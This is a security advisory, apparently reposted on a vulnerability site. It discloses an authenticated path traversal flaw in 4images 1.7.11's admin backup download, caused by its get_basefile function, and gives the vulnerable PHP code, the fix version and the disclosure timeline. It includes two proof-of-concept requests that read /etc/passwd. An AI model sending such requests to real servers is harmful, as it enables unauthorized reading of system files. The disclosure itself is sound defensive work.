4images 1.7.11 Path Traversal

Published
Credit
Risk
2015.12.14
Tim Coen
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

When downloading or displaying a backup file, the file Parameter is vulnerable
to directory traversal. This is the case because the get_basefile function
contains a bug. When the passed path name ends with a slash, it will return the
entire path instead of the file name.

By adding ?/ to the file name, an attacker can thus download or display
arbitrary files.

Admin credentials are required to view or download backup files.

3. Proof of Concept


GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1
GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1

4. Code


/admin/bachup.php
if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
$file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file']));
}
else {
$file = "";
}

if ($action == "downloadbackup") {
$size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
header("Content-type: application/x-unknown");
header("Content-length: $size\n");
header("Content-Disposition: attachment; filename=$file\n");
readfile(ROOT_PATH.DATABASE_DIR."/".$file);
exit;
}

/includes/functions.php
function get_basename($path) {
$path = str_replace("\\", "/", $path);
$name = substr(strrchr($path, "/"), 1);
return $name ? $name : $path;
}

function get_basefile($path) {
$basename = get_basename($path);
preg_match("#(.+)\?(.+)#", $basename, $regs);
return isset($regs[1]) ? $regs[1] : $basename;
}

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com